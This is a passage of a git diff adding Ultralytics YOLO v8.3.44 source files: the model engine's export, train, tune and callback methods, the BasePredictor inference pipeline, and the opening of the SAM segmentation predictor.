including metrics for + different export formats. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.benchmark(data="coco8.yaml", imgsz=640, half=True) + >>> print(results) + """ + self._check_is_pytorch_model() + from ultralytics.utils.benchmarks import benchmark + + custom = {"verbose": False} # method defaults + args = {**DEFAULT_CFG_DICT, **self.model.args, **custom, **kwargs, "mode": "benchmark"} + return benchmark( + model=self, + data=kwargs.get("data"), # if no 'data' argument passed set data=None for default datasets + imgsz=args["imgsz"], + half=args["half"], + int8=args["int8"], + device=args["device"], + verbose=kwargs.get("verbose"), + ) + + def export( + self, + **kwargs, + ) -> str: + """ + Exports the model to a different format suitable for deployment. + + This method facilitates the export of the model to various formats (e.g., ONNX, TorchScript) for deployment + purposes. It uses the 'Exporter' class for the export process, combining model-specific overrides, method + defaults, and any additional arguments provided. + + Args: + **kwargs (Dict): Arbitrary keyword arguments to customize the export process. These are combined with + the model's overrides and method defaults. Common arguments include: + format (str): Export format (e.g., 'onnx', 'engine', 'coreml'). + half (bool): Export model in half-precision. + int8 (bool): Export model in int8 precision. + device (str): Device to run the export on. + workspace (int): Maximum memory workspace size for TensorRT engines. + nms (bool): Add Non-Maximum Suppression (NMS) module to model. + simplify (bool): Simplify ONNX model. + + Returns: + (str): The path to the exported model file. + + Raises: + AssertionError: If the model is not a PyTorch model. + ValueError: If an unsupported export format is specified. + RuntimeError: If the export process fails due to errors. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.export(format="onnx", dynamic=True, simplify=True) + 'path/to/exported/model.onnx' + """ + self._check_is_pytorch_model() + from .exporter import Exporter + + custom = { + "imgsz": self.model.args["imgsz"], + "batch": 1, + "data": None, + "device": None, # reset to avoid multi-GPU errors + "verbose": False, + } # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "export"} # highest priority args on the right + return Exporter(overrides=args, _callbacks=self.callbacks)(model=self.model) + + def train( + self, + trainer=None, + **kwargs, + ): + """ + Trains the model using the specified dataset and training configuration. + + This method facilitates model training with a range of customizable settings. It supports training with a + custom trainer or the default training approach. The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.train(data="coco8.yaml", epochs=3) + """ + self._check_is_pytorch_model() + if hasattr(self.session, "model") and self.session.model.id: # Ultralytics HUB session with loaded model + if any(kwargs): + LOGGER.warning("WARNING ⚠️ using HUB training arguments, ignoring local training arguments.") + kwargs = self.session.train_args # overwrite kwargs + + checks.check_pip_update_available() + + overrides = yaml_load(checks.check_yaml(kwargs["cfg"])) if kwargs.get("cfg") else self.overrides + custom = { + # NOTE: handle the case when 'cfg' includes 'data'. + "data": overrides.get("data") or DEFAULT_CFG_DICT["data"] or TASK2DATA[self.task], + "model": self.overrides["model"], + "task": self.task, + } # method defaults + args = {**overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + if args.get("resume"): + args["resume"] = self.ckpt_path + + self.trainer = (trainer or self._smart_load("trainer"))(overrides=args, _callbacks=self.callbacks) + if not args.get("resume"): # manually set model only if not resuming + self.trainer.model = self.trainer.get_model(weights=self.model if self.ckpt else None, cfg=self.model.yaml) + self.model = self.trainer.model + + self.trainer.hub_session = self.session # attach optional HUB session + self.trainer.train() + # Update model and cfg after training + if RANK in {-1, 0}: + ckpt = self.trainer.best if self.trainer.best.exists() else self.trainer.last + self.model, _ = attempt_load_one_weight(ckpt) + self.overrides = self.model.args + self.metrics = getattr(self.trainer.validator, "metrics", None) # TODO: no metrics returned by DDP + return self.metrics + + def tune( + self, + use_ray=False, + iterations=10, + *args, + **kwargs, + ): + """ + Conducts hyperparameter tuning for the model, with an option to use Ray Tune. + + This method supports two modes of hyperparameter tuning: using Ray Tune or a custom tuning method. + When Ray Tune is enabled, it leverages the 'run_ray_tune' function from the ultralytics.utils.tuner module. + Otherwise, it uses the internal 'Tuner' class for tuning. The method combines default, overridden, and + custom arguments to configure the tuning process. + + Args: + use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False. + iterations (int): The number of tuning iterations to perform. Defaults to 10. + *args (List): Variable length argument list for additional arguments. + **kwargs (Dict): Arbitrary keyword arguments. These are combined with the model's overrides and defaults. + + Returns: + (Dict): A dictionary containing the results of the hyperparameter search. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.tune(use_ray=True, iterations=20) + >>> print(results) + """ + self._check_is_pytorch_model() + if use_ray: + from ultralytics.utils.tuner import run_ray_tune + + return run_ray_tune(self, max_samples=iterations, *args, **kwargs) + else: + from .tuner import Tuner + + custom = {} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + return Tuner(args=args, _callbacks=self.callbacks)(model=self, iterations=iterations) + + def _apply(self, fn) -> "Model": + """ + Applies a function to model tensors that are not parameters or registered buffers. + + This method extends the functionality of the parent class's _apply method by additionally resetting the + predictor and updating the device in the model's overrides. It's typically used for operations like + moving the model to a different device or changing its precision. + + Args: + fn (Callable): A function to be applied to the model's tensors. This is typically a method like + to(), cpu(), cuda(), half(), or float(). + + Returns: + (Model): The model instance with the function applied and updated attributes. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = model._apply(lambda t: t.cuda()) # Move model to GPU + """ + self._check_is_pytorch_model() + self = super()._apply(fn) # noqa + self.predictor = None # reset predictor as device may have changed + self.overrides["device"] = self.device # was str(self.device) i.e. device(type='cuda', index=0) -> 'cuda:0' + return self + + @property + def names(self) -> Dict[int, str]: + """ + Retrieves the class names associated with the loaded model. + + This property returns the class names if they are defined in the model. It checks the class names for validity + using the 'check_class_names' function from the ultralytics.nn.autobackend module. If the predictor is not + initialized, it sets it up before retrieving the names. + + Returns: + (Dict[int, str]): A dict of class names associated with the model. + + Raises: + AttributeError: If the model or predictor does not have a 'names' attribute. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.names) + {0: 'person', 1: 'bicycle', 2: 'car', ...} + """ + from ultralytics.nn.autobackend import check_class_names + + if hasattr(self.model, "names"): + return check_class_names(self.model.names) + if not self.predictor: # export formats will not have predictor defined until predict() is called + self.predictor = self._smart_load("predictor")(overrides=self.overrides, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=False) + return self.predictor.model.names + + @property + def device(self) -> torch.device: + """ + Retrieves the device on which the model's parameters are allocated. + + This property determines the device (CPU or GPU) where the model's parameters are currently stored. It is + applicable only to models that are instances of nn.Module. + + Returns: + (torch.device): The device (CPU/GPU) of the model. + + Raises: + AttributeError: If the model is not a PyTorch nn.Module instance. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.device) + device(type='cuda', index=0) # if CUDA is available + >>> model = model.to("cpu") + >>> print(model.device) + device(type='cpu') + """ + return next(self.model.parameters()).device if isinstance(self.model, nn.Module) else None + + @property + def transforms(self): + """ + Retrieves the transformations applied to the input data of the loaded model. + + This property returns the transformations if they are defined in the model. The transforms + typically include preprocessing steps like resizing, normalization, and data augmentation + that are applied to input data before it is fed into the model. + + Returns: + (object | None): The transform object of the model if available, otherwise None. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> transforms = model.transforms + >>> if transforms: + ... print(f"Model transforms: {transforms}") + ... else: + ... print("No transforms defined for this model.") + """ + return self.model.transforms if hasattr(self.model, "transforms") else None + + def add_callback(self, event: str, func) -> None: + """ + Adds a callback function for a specified event. + + This method allows registering custom callback functions that are triggered on specific events during + model operations such as training or inference. Callbacks provide a way to extend and customize the + behavior of the model at various stages of its lifecycle. + + Args: + event (str): The name of the event to attach the callback to. Must be a valid event name recognized + by the Ultralytics framework. + func (Callable): The callback function to be registered. This function will be called when the + specified event occurs. + + Raises: + ValueError: If the event name is not recognized or is invalid. + + Examples: + >>> def on_train_start(trainer): + ... print("Training is starting!") + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", on_train_start) + >>> model.train(data="coco8.yaml", epochs=1) + """ + self.callbacks[event].append(func) + + def clear_callback(self, event: str) -> None: + """ + Clears all callback functions registered for a specified event. + + This method removes all custom and default callback functions associated with the given event. + It resets the callback list for the specified event to an empty list, effectively removing all + registered callbacks for that event. + + Args: + event (str): The name of the event for which to clear the callbacks. This should be a valid event name + recognized by the Ultralytics callback system. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", lambda: print("Training started")) + >>> model.clear_callback("on_train_start") + >>> # All callbacks for 'on_train_start' are now removed + + Notes: + - This method affects both custom callbacks added by the user and default callbacks + provided by the Ultralytics framework. + - After calling this method, no callbacks will be executed for the specified event + until new ones are added. + - Use with caution as it removes all callbacks, including essential ones that might + be required for proper functioning of certain operations. + """ + self.callbacks[event] = [] + + def reset_callbacks(self) -> None: + """ + Resets all callbacks to their default functions. + + This method reinstates the default callback functions for all events, removing any custom callbacks that were + previously added. It iterates through all default callback events and replaces the current callbacks with the + default ones. + + The default callbacks are defined in the 'callbacks.default_callbacks' dictionary, which contains predefined + functions for various events in the model's lifecycle, such as on_train_start, on_epoch_end, etc. + + This method is useful when you want to revert to the original set of callbacks after making custom + modifications, ensuring consistent behavior across different runs or experiments. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", custom_function) + >>> model.reset_callbacks() + # All callbacks are now reset to their default functions + """ + for event in callbacks.default_callbacks.keys(): + self.callbacks[event] = [callbacks.default_callbacks[event][0]] + + @staticmethod + def _reset_ckpt_args(args: dict) -> dict: + """ + Resets specific arguments when loading a PyTorch model checkpoint. + + This static method filters the input arguments dictionary to retain only a specific set of keys that are + considered important for model loading. It's used to ensure that only relevant arguments are preserved + when loading a model from a checkpoint, discarding any unnecessary or potentially conflicting settings. + + Args: + args (dict): A dictionary containing various model arguments and settings. + + Returns: + (dict): A new dictionary containing only the specified include keys from the input arguments. + + Examples: + >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100} + >>> reset_args = Model._reset_ckpt_args(original_args) + >>> print(reset_args) + {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'} + """ + include = {"imgsz", "data", "task", "single_cls"} # only remember these arguments when loading a PyTorch model + return {k: v for k, v in args.items() if k in include} + + # def __getattr__(self, attr): + # """Raises error if object has no requested attribute.""" + # name = self.__class__.__name__ + # raise AttributeError(f"'{name}' object has no attribute '{attr}'. See valid attributes below.\n{self.__doc__}") + + def _smart_load(self, key: str): + """ + Loads the appropriate module based on the model task. + + This method dynamically selects and returns the correct module (model, trainer, validator, or predictor) + based on the current task of the model and the provided key. It uses the task_map attribute to determine + the correct module to load. + + Args: + key (str): The type of module to load. Must be one of 'model', 'trainer', 'validator', or 'predictor'. + + Returns: + (object): The loaded module corresponding to the specified key and current task. + + Raises: + NotImplementedError: If the specified key is not supported for the current task. + + Examples: + >>> model = Model(task="detect") + >>> predictor = model._smart_load("predictor") + >>> trainer = model._smart_load("trainer") + + Notes: + - This method is typically used internally by other methods of the Model class. + - The task_map attribute should be properly initialized with the correct mappings for each task. + """ + try: + return self.task_map[self.task][key] + except Exception as e: + name = self.__class__.__name__ + mode = inspect.stack()[1][3] # get the function name. + raise NotImplementedError( + emojis(f"WARNING ⚠️ '{name}' model does not support '{mode}' mode for '{self.task}' task yet.") + ) from e + + @property + def task_map(self) -> dict: + """ + Provides a mapping from model tasks to corresponding classes for different modes. + + This property method returns a dictionary that maps each supported task (e.g., detect, segment, classify) + to a nested dictionary. The nested dictionary contains mappings for different operational modes + (model, trainer, validator, predictor) to their respective class implementations. + + The mapping allows for dynamic loading of appropriate classes based on the model's task and the + desired operational mode. This facilitates a flexible and extensible architecture for handling + various tasks and modes within the Ultralytics framework. + + Returns: + (Dict[str, Dict[str, Any]]): A dictionary where keys are task names (str) and values are + nested dictionaries. Each nested dictionary has keys 'model', 'trainer', 'validator', and + 'predictor', mapping to their respective class implementations. + + Examples: + >>> model = Model() + >>> task_map = model.task_map + >>> detect_class_map = task_map["detect"] + >>> segment_class_map = task_map["segment"] + + Note: + The actual implementation of this method may vary depending on the specific tasks and + classes supported by the Ultralytics framework. The docstring provides a general + description of the expected behavior and structure. + """ + raise NotImplementedError("Please provide task map for your model!") + + def eval(self): + """ + Sets the model to evaluation mode. + + This method changes the model's mode to evaluation, which affects layers like dropout and batch normalization + that behave differently during training and evaluation. + + Returns: + (Model): The model instance with evaluation mode set. + + Examples: + >> model = YOLO("yolo11n.pt") + >> model.eval() + """ + self.model.eval() + return self + + def __getattr__(self, name): + """ + Enables accessing model attributes directly through the Model class. + + This method provides a way to access attributes of the underlying model directly through the Model class + instance. It first checks if the requested attribute is 'model', in which case it returns the model from + the module dictionary. Otherwise, it delegates the attribute lookup to the underlying model. + + Args: + name (str): The name of the attribute to retrieve. + + Returns: + (Any): The requested attribute value. + + Raises: + AttributeError: If the requested attribute does not exist in the model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.44/engine/predictor.py b/2024.ultralytics/v8.3.44/engine/predictor.py new file mode 100644 index 0000000..c525016 --- /dev/null +++ b/2024.ultralytics/v8.3.44/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +STREAM_WARNING = """ +WARNING ⚠️ inference results will accumulate in RAM unless `stream=True` is passed, causing potential out-of-memory +errors for large sources or long-running streams and videos. See https://docs.ultralytics.com/modes/predict/ for help. + +Example: + results = model(source=..., stream=True) # generator of Results objects + for r in results: + boxes = r.boxes # Boxes object for bbox outputs + masks = r.masks # Masks object for segment masks outputs + probs = r.probs # Class probabilities for classification outputs +""" + + +class BasePredictor: + """ + BasePredictor. + + A base class for creating predictors. + + Attributes: + args (SimpleNamespace): Configuration for the predictor. + save_dir (Path): Directory to save results. + done_warmup (bool): Whether the predictor has finished setup. + model (nn.Module): Model used for prediction. + data (dict): Data configuration. + device (torch.device): Device used for prediction. + dataset (Dataset): Dataset used for prediction. + vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output. + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initializes the BasePredictor class. + + Args: + cfg (str, optional): Path to a configuration file. Defaults to DEFAULT_CFG. + overrides (dict, optional): Configuration overrides. Defaults to None. + """ + self.args = get_cfg(cfg, overrides) + self.save_dir = get_save_dir(self.args) + if self.args.conf is None: + self.args.conf = 0.25 # default conf=0.25 + self.done_warmup = False + if self.args.show: + self.args.show = check_imshow(warn=True) + + # Usable if setup is done + self.model = None + self.data = self.args.data # data_dict + self.imgsz = None + self.device = None + self.dataset = None + self.vid_writer = {} # dict of {save_path: video_writer, ...} + self.plotted_img = None + self.source_type = None + self.seen = 0 + self.windows = [] + self.batch = None + self.results = None + self.transforms = None + self.callbacks = _callbacks or callbacks.get_default_callbacks() + self.txt_path = None + self._lock = threading.Lock() # for automatic thread-safe inference + callbacks.add_integration_callbacks(self) + + def preprocess(self, im): + """ + Prepares input image before inference. + + Args: + im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list. + """ + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW, (n, 3, h, w) + im = np.ascontiguousarray(im) # contiguous + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() # uint8 to fp16/32 + if not_tensor: + im /= 255 # 0 - 255 to 0.0 - 1.0 + return im + + def inference(self, im, *args, **kwargs): + """Runs inference on a given image using the specified model and arguments.""" + visualize = ( + increment_path(self.save_dir / Path(self.batch[0][0]).stem, mkdir=True) + if self.args.visualize and (not self.source_type.tensor) + else False + ) + return self.model(im, augment=self.args.augment, visualize=visualize, embed=self.args.embed, *args, **kwargs) + + def pre_transform(self, im): + """ + Pre-transform input image before inference. + + Args: + im (List(np.ndarray)): (N, 3, h, w) for tensor, [(h, w, 3) x N] for list. + + Returns: + (list): A list of transformed images. + """ + same_shapes = len({x.shape for x in im}) == 1 + letterbox = LetterBox( + self.imgsz, + auto=same_shapes and (self.model.pt or (getattr(self.model, "dynamic", False) and not self.model.imx)), + stride=self.model.stride, + ) + return [letterbox(image=x) for x in im] + + def postprocess(self, preds, img, orig_imgs): + """Post-processes predictions for an image and returns them.""" + return preds + + def __call__(self, source=None, model=None, stream=False, *args, **kwargs): + """Performs inference on an image or stream.""" + self.stream = stream + if stream: + return self.stream_inference(source, model, *args, **kwargs) + else: + return list(self.stream_inference(source, model, *args, **kwargs)) # merge list of Result into one + + def predict_cli(self, source=None, model=None): + """ + Method used for Command Line Interface (CLI) prediction. + + This function is designed to run predictions using the CLI. It sets up the source and model, then processes + the inputs in a streaming manner. This method ensures that no outputs accumulate in memory by consuming the + generator without storing results. + + Note: + Do not modify this function or remove the generator. The generator ensures that no outputs are + accumulated in memory, which is critical for preventing memory issues during long-running predictions. + """ + gen = self.stream_inference(source, model) + for _ in gen: # sourcery skip: remove-empty-nested-block, noqa + pass + + def setup_source(self, source): + """Sets up source and inference mode.""" + self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2) # check image size + self.transforms = ( + getattr( + self.model.model, + "transforms", + classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction), + ) + if self.args.task == "classify" + else None + ) + self.dataset = load_inference_source( + source=source, + batch=self.args.batch, + vid_stride=self.args.vid_stride, + buffer=self.args.stream_buffer, + ) + self.source_type = self.dataset.source_type + if not getattr(self, "stream", True) and ( + self.source_type.stream + or self.source_type.screenshot + or len(self.dataset) > 1000 # many images + or any(getattr(self.dataset, "video_flag", [False])) + ): # videos + LOGGER.warning(STREAM_WARNING) + self.vid_writer = {} + + @smart_inference_mode() + def stream_inference(self, source=None, model=None, *args, **kwargs): + """Streams real-time inference on camera feed and saves results to file.""" + if self.args.verbose: + LOGGER.info("") + + # Setup model + if not self.model: + self.setup_model(model) + + with self._lock: # for thread-safe inference + # Setup source every time predict is called + self.setup_source(source if source is not None else self.args.source) + + # Check if save_dir/ label file exists + if self.args.save or self.args.save_txt: + (self.save_dir / "labels" if self.args.save_txt else self.save_dir).mkdir(parents=True, exist_ok=True) + + # Warmup model + if not self.done_warmup: + self.model.warmup(imgsz=(1 if self.model.pt or self.model.triton else self.dataset.bs, 3, *self.imgsz)) + self.done_warmup = True + + self.seen, self.windows, self.batch = 0, [], None + profilers = ( + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ) + self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation mode.""" + self.model = AutoBackend( + weights=model or self.args.model, + device=select_device(self.args.device, verbose=verbose), + dnn=self.args.dnn, + data=self.args.data, + fp16=self.args.half, + batch=self.args.batch, + fuse=True, + verbose=verbose, + ) + + self.device = self.model.device # update device + self.args.half = self.model.fp16 # update half + self.model.eval() + + def write_results(self, i, p, im, s): + """Write inference results to a file or directory.""" + string = "" # print string + if len(im.shape) == 3: + im = im[None] # expand for batch dim + if self.source_type.stream or self.source_type.from_img or self.source_type.tensor: # batch_size >= 1 + string += f"{i}: " + frame = self.dataset.count + else: + match = re.search(r"frame (\d+)/", s[i]) + frame = int(match[1]) if match else None # 0 if frame undetermined + + self.txt_path = self.save_dir / "labels" / (p.stem + ("" if self.dataset.mode == "image" else f"_{frame}")) + string += "{:g}x{:g} ".format(*im.shape[2:]) + result = self.results[i] + result.save_dir = self.save_dir.__str__() # used in other locations + string += f"{result.verbose()}{result.speed['inference']:.1f}ms" + + # Add predictions to image + if self.args.save or self.args.show: + self.plotted_img = result.plot( + line_width=self.args.line_width, + boxes=self.args.show_boxes, + conf=self.args.show_conf, + labels=self.args.show_labels, + im_gpu=None if self.args.retina_masks else im[i], + ) + + # Save results + if self.args.save_txt: + result.save_txt(f"{self.txt_path}.txt", save_conf=self.args.save_conf) + if self.args.save_crop: + result.save_crop(save_dir=self.save_dir / "crops", file_name=self.txt_path.stem) + if self.args.show: + self.show(str(p)) + if self.args.save: + self.save_predicted_images(str(self.save_dir / p.name), frame) + + return string + + def save_predicted_images(self, save_path="", frame=0): + """Save video predictions as mp4 at specified path.""" + im = self.plotted_img + + # Save videos and streams + if self.dataset.mode in {"stream", "video"}: + fps = self.dataset.fps if self.dataset.mode == "video" else 30 + frames_path = f'{save_path.split(".", 1)[0]}_frames/' + if save_path not in self.vid_writer: # new video + if self.args.save_frames: + Path(frames_path).mkdir(parents=True, exist_ok=True) + suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG") + self.vid_writer[save_path] = cv2.VideoWriter( + filename=str(Path(save_path).with_suffix(suffix)), + fourcc=cv2.VideoWriter_fourcc(*fourcc), + fps=fps, # integer required, floats produce error in MP4 codec + frameSize=(im.shape[1], im.shape[0]), # (width, height) + ) + + # Save video + self.vid_writer[save_path].write(im) + if self.args.save_frames: + cv2.imwrite(f"{frames_path}{frame}.jpg", im) + + # Save images + else: + cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im) # save to JPG for best support + + def show(self, p=""): + """Display an image in a window using the OpenCV imshow function.""" + im = self.plotted_img + if platform.system() == "Linux" and p not in self.windows: + self.windows.append(p) + cv2.namedWindow(p, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux) + cv2.resizeWindow(p, im.shape[1], im.shape[0]) # (width, height) + cv2.imshow(p, im) + cv2.waitKey(300 if self.dataset.mode == "image" else 1) # 1 millisecond + + def run_callbacks(self, event: str): + """Runs all registered callbacks for a specific event.""" + for callback in self.callbacks.get(event, []): + callback(self) + + def add_callback(self, event: str, func): + """Add callback.""" + self.callbacks[event].append(func) diff --git a/2024.ultralytics/v8.3.44/models/sam/predict.py b/2024.ultralytics/v8.3.44/models/sam/predict.py new file mode 100644 index 0000000..540d100 --- /dev/null +++ b/2024.ultralytics/v8.3.44/models/sam/predict.py @@ -0,0 +1,1606 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Generate predictions using the Segment Anything Model (SAM). + +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. + std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im 